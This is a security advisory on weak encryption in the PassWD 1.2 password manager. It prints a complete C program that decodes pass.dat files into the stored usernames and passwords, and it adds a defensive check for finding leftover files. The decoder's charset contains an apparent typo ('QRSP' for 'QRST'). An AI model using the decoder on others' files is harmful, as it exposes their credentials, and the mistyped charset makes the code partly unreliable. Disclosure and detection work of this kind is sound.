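PassWD 1.2 Weak Encryption Vulnerability
2008-04-10 03:04:36 Source: Internet
Published: 2000-06-06
Updated: 2000-06-06
Affected systems:
PassWD PassWD 1.2
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
Description:
PassWD 1.2 is a password management tool that stores user login
information for various URLs, such as user names, passwords and links,
in the pass.dat file in the PassWD installation directory. Unfortunately,
this information is stored in pass.dat using a very weak encryption
mechanism: there is a key that can decode all of the stored passwords.
<* Source: Daniel Roethlisberger admin@roe.ch *>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!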
/*
 * Decoder for PassWD v1.2 `pass.dat' password files
 *
 * Written 2000 by Daniel Roethlisberger <admin@roe.ch>
 *
 * This code is hereby placed in the public domain.
 * Use this code at your own risk for whatever you want.
 *
 * The decoded data is not parsed in any way - it should
 * be very easy to moderately experienced programmers
 * to add that themselves.
 *
 */
#include <stdio.h>

int main(int argc, char *argv[])
{
    unsigned char charpos;
    FILE* outfile;
    FILE* infile;
    int a;              /* int, so that EOF can be told apart from data */
    int b;
    unsigned char key;
    int x;
    /* the 99-character alphabet, stored twice so that the index
       (charpos + 99 - key) never needs a modulo operation */
    unsigned char charset[] = "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@AB"
        "CDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\b\t\n\r !"
        "\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdef"
        "ghijklmnopqrstuvwxyz{|}~";

    printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n");
    printf("Written 2000 by Daniel Roethlisberger <admin@roe.ch>\n\n");
    if((argc > 3) || (argc < 2))
    {
        printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]);
        printf("If <outfile> is omitted, the output is dumped to stdout.\n");
        return 1;
    }
    infile = fopen(argv[1], "r");
    if(infile == NULL)
    {
        printf("Could not open file %s\n", argv[1]);
        return 1;
    }
    if(argc == 2)
        outfile = stdout;
    else
    {
        outfile = fopen(argv[2], "w");
        if(outfile == NULL)
        {
            printf("Could not write to file %s\n", argv[2]);
            fclose(infile);
            return 1;
        }
    }
    getc(infile);       /* jump over decoy byte */
    a = getc(infile);   /* read encoded key byte 1 */
    b = getc(infile);   /* read encoded key byte 2 */
    if(b == EOF)
    {
        printf("ERROR - encountered EOF within header\n");
        fclose(infile);
        if(outfile != stdout)
            fclose(outfile);
        return 1;
    }
    /* this line `decodes' the key */
    key = (unsigned char)((a - 'b') * 10 + (b - 'b'));
    /* read through infile and dump decoded output to outfile: */
    x = getc(infile);
    while(x != EOF)
    {
        for(charpos = 0; x != charset[charpos]; charpos++)
        {
            if(charpos > 99)
            {
                printf("\nERROR - encountered illegal character in source file\n");
                fclose(infile);
                if(outfile != stdout)
                    fclose(outfile);
                return 1;
            }
        }
        /* plain = cypher - key */
        putc(charset[charpos + 99 - key], outfile);
        x = getc(infile);
    }
    if(argc == 2)
        printf("\n\n");
    printf("Done.\n");
    fclose(infile);
    if(outfile != stdout)
        fclose(outfile);
    return 0;
}
Recommendation:
For now, consider upgrading to PassWD 2000 and deleting the old pass.dat file.
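An added example, not part of the original advisory or of PassWD: a C check that flags files with the PassWD 1.2 pass.dat layout, so that leftover copies can be found and removed after upgrading. The layout test (decoy byte, two key-digit bytes in 'b'..'k', body limited to control and printable ASCII) is an assumption inferred from the decoder above; the function names and the 64 KiB read limit are hypothetical.

```c
#include <stddef.h>
#include <stdio.h>

/* Assumptions inferred from the decoder on this page: byte 0 is a decoy,
 * bytes 1-2 hold the key digits as 'b' + digit (0-9), and each body byte is
 * \b, \t, \n, \r or printable ASCII (0x20-0x7E). */
static int body_byte_ok(unsigned char c)
{
    return c == '\b' || c == '\t' || c == '\n' || c == '\r' ||
           (c >= 0x20 && c <= 0x7E);
}

/* Returns 1 if buf has the PassWD 1.2 pass.dat layout, otherwise 0. */
int looks_like_passwd12(const unsigned char *buf, size_t len)
{
    size_t i;
    if (len < 4)                 /* 3-byte header plus at least one body byte */
        return 0;
    if (buf[1] < 'b' || buf[1] > 'k' || buf[2] < 'b' || buf[2] > 'k')
        return 0;                /* header bytes are not encoded digits */
    for (i = 3; i < len; i++)
        if (!body_byte_ok(buf[i]))
            return 0;
    return 1;
}

/* Checks the first 64 KiB of a file; returns -1 if it cannot be opened. */
int file_looks_like_passwd12(const char *path)
{
    static unsigned char buf[65536];
    size_t n;
    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return -1;
    n = fread(buf, 1, sizeof buf, f);
    fclose(f);
    return looks_like_passwd12(buf, n);
}

int main(int argc, char *argv[])
{
    int i, r;
    for (i = 1; i < argc; i++) {
        r = file_looks_like_passwd12(argv[i]);
        printf("%s: %s\n", argv[i], r < 0 ? "unreadable"
               : r ? "PassWD 1.2 layout, migrate then delete" : "no match");
    }
    return 0;
}
```

The check is a heuristic: short ASCII text files can match by coincidence, so treat a match as a prompt to inspect the file, not as proof.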